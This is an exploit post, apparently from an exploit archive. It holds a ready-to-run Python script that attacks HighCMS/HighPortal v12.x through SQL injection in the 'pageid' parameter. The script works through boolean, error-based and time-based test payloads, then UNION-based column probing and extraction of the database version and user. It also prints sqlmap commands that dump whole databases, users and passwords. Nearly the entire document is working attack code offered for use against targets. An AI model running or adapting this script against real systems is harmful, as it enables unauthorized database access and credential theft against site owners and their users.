Share
## https://sploitus.com/exploit?id=PACKETSTORM:212925
=============================================================================================================================================
    | # Title     : HighPortal v12.x SQL Injection Exploit                                                                                      |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |
    | # Vendor    : https://aryanic.com/                                                                                                        |
    =============================================================================================================================================
    
    POC : 
    
    [+] References : https://packetstorm.news/files/id/167170/
    
    
    [+] Summary : 
              
             a critical SQL Injection vulnerability in HighCMS/HighPortal version 12.x. 
    		 The vulnerability allows unauthenticated attackers to execute arbitrary SQL queries through the pageid parameter, potentially leading to complete database compromise.
    		 
    	
    [+] POC :  python poc.py
    
    #!/usr/bin/env python3
    """
    HighCMS/HighPortal v12.x SQL Injection Exploit
    Author: indoushka
    Vulnerability: SQL Injection in pageid parameter
    """
    
    import requests
    import sys
    import urllib3
    from argparse import ArgumentParser
    
    # Disable SSL warnings
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    
    class HighCMSExploit:
        def __init__(self, target):
            self.target = target.rstrip('/')
            self.session = requests.Session()
            self.session.headers.update({
                'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
                'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
                'Accept-Language': 'en-US,en;q=0.5',
                'Accept-Encoding': 'gzip, deflate',
                'Connection': 'keep-alive'
            })
        
        def check_vulnerability(self):
            """Check if target is vulnerable to SQL Injection"""
            print(f"[*] Checking vulnerability for: {self.target}")
            
            # Test payloads
            test_payloads = [
                "6528' AND '1'='1",
                "6528' AND '1'='2", 
                "6528' AND SLEEP(5)--",
                "6528 UNION SELECT 1,2,3,4,5--"
            ]
            
            vulnerable = False
            
            for payload in test_payloads:
                url = f"{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid={payload}"
                
                try:
                    # Time-based SQL injection test
                    if "SLEEP" in payload:
                        import time
                        start_time = time.time()
                        response = self.session.get(url, timeout=10, verify=False)
                        end_time = time.time()
                        
                        if end_time - start_time >= 5:
                            print(f"[+] Time-based SQL Injection confirmed! (Delay: {end_time - start_time:.2f}s)")
                            vulnerable = True
                            break
                    else:
                        response = self.session.get(url, timeout=10, verify=False)
                        
                        # Check for error-based indicators
                        error_indicators = [
                            "SQL syntax",
                            "Microsoft OLE DB Provider",
                            "ODBC Driver",
                            "SQLServer",
                            "Unclosed quotation mark",
                            "syntax error"
                        ]
                        
                        for error in error_indicators:
                            if error.lower() in response.text.lower():
                                print(f"[+] Error-based SQL Injection confirmed!")
                                print(f"[+] Payload: {payload}")
                                vulnerable = True
                                break
                        
                        # Boolean-based test
                        if "'1'='1" in payload and response.status_code == 200:
                            true_response = response.text
                            
                        if "'1'='2" in payload and response.status_code == 200:
                            false_response = response.text
                            
                            if true_response != false_response:
                                print(f"[+] Boolean-based SQL Injection confirmed!")
                                vulnerable = True
                                break
                                
                except Exception as e:
                    print(f"[-] Error testing payload {payload}: {e}")
                    continue
            
            return vulnerable
        
        def exploit_union(self, columns=5):
            """Exploit using UNION-based SQL injection"""
            print(f"[*] Attempting UNION-based exploitation with {columns} columns")
            
            # Test different column counts
            for col_count in range(1, columns + 1):
                nulls = ','.join(['NULL'] * col_count)
                payload = f"6528 UNION SELECT {nulls}--"
                
                url = f"{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid={payload}"
                
                try:
                    response = self.session.get(url, timeout=10, verify=False)
                    
                    if response.status_code == 200 and "error" not in response.text.lower():
                        print(f"[+] UNION injection successful with {col_count} columns")
                        
                        # Now extract data
                        self.extract_data(col_count)
                        return True
                        
                except Exception as e:
                    print(f"[-] Error with {col_count} columns: {e}")
            
            return False
        
        def extract_data(self, column_count):
            """Extract database information"""
            print("[*] Extracting database information...")
            
            # Get database version
            version_payloads = [
                "6528 UNION SELECT 1,@@version,3,4,5--",
                "6528 UNION SELECT 1,version(),3,4,5--", 
                "6528 UNION SELECT 1,banner,3,4,5 FROM v$version--"
            ]
            
            for payload in version_payloads:
                url = f"{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid={payload}"
                
                try:
                    response = self.session.get(url, timeout=10, verify=False)
                    if response.status_code == 200:
                        # Look for version information in response
                        print("[+] Database version information extracted")
                        break
                except:
                    continue
            
            # Get current database user
            user_payload = f"6528 UNION SELECT 1,user(),3,4,5--"
            url = f"{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid={user_payload}"
            
            try:
                response = self.session.get(url, timeout=10, verify=False)
                print("[+] Current user information extracted")
            except:
                pass
        
        def generate_sqlmap_command(self):
            """Generate sqlmap command for automated exploitation"""
            sqlmap_cmd = f'sqlmap -u "{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528" --batch --level=5 --risk=3'
            
            print("\n[+] SQLMap Commands:")
            print("=" * 50)
            print("# Basic detection:")
            print(f'sqlmap -u "{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528" --batch')
            
            print("\n# Full database dump:")
            print(f'sqlmap -u "{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528" --batch --dump-all')
            
            print("\n# Get database users:")
            print(f'sqlmap -u "{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528" --batch --users')
            
            print("\n# Get database passwords:")
            print(f'sqlmap -u "{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528" --batch --passwords')
    
    def main():
        banner = """
    โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ•—   โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—  โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•—   โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•—  โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•—  โ–ˆโ–ˆโ•— โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— 
    โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ–ˆโ–ˆโ•—  โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•”โ•โ•โ•โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•‘   โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ•โ•โ•โ•โ•โ–ˆโ–ˆโ•‘  โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—
    โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•‘โ–ˆโ–ˆ   โ–ˆโ•”โ•โ–ˆโ–ˆโ•‘   โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘   โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ• โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•‘
    โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘โ•šโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•‘   โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘   โ–ˆโ–ˆโ•‘โ•šโ•โ•โ•โ•โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•‘
    โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘ โ•šโ–ˆโ–ˆโ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•โ•šโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•โ•šโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘  โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘  โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•‘  โ–ˆโ–ˆโ•‘
    โ•šโ•โ•โ•šโ•โ•  โ•šโ•โ•โ•โ•โ•šโ•โ•โ•โ•โ•โ•  โ•šโ•โ•โ•โ•โ•โ•  โ•šโ•โ•โ•โ•โ•โ• โ•šโ•โ•โ•โ•โ•โ•โ•โ•šโ•โ•  โ•šโ•โ•โ•šโ•โ•  โ•šโ•โ•โ•šโ•โ•  โ•šโ•โ•
    
        HighCMS/HighPortal v12.x SQL Injection Exploit
        By: indoushka
        """
        print(banner)
        
        parser = ArgumentParser(description='HighCMS SQL Injection Exploit')
        parser.add_argument('-u', '--url', required=True, help='Target URL (e.g., https://example.com)')
        parser.add_argument('--check', action='store_true', help='Check vulnerability only')
        parser.add_argument('--exploit', action='store_true', help='Run full exploitation')
        parser.add_argument('--sqlmap', action='store_true', help='Generate sqlmap commands')
        
        args = parser.parse_args()
        
        exploit = HighCMSExploit(args.url)
        
        if args.check:
            if exploit.check_vulnerability():
                print("\n[!] Target is VULNERABLE to SQL Injection")
            else:
                print("\n[!] Target does not appear to be vulnerable")
        
        elif args.exploit:
            if exploit.check_vulnerability():
                print("\n[*] Starting exploitation...")
                exploit.exploit_union()
        
        elif args.sqlmap:
            exploit.generate_sqlmap_command()
        
        else:
            # Default: check and provide options
            if exploit.check_vulnerability():
                print("\n[+] Vulnerability confirmed!")
                print("\nAvailable options:")
                print("1. Run full exploitation: python exploit.py -u TARGET --exploit")
                print("2. Generate sqlmap commands: python exploit.py -u TARGET --sqlmap")
            else:
                print("\n[-] Target not vulnerable or not accessible")
    
    if __name__ == "__main__":
        if len(sys.argv) == 1:
            print("Usage: python highcms_exploit.py -u https://target.com")
            print("Options: --check, --exploit, --sqlmap")
            sys.exit(1)
        
        main()
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================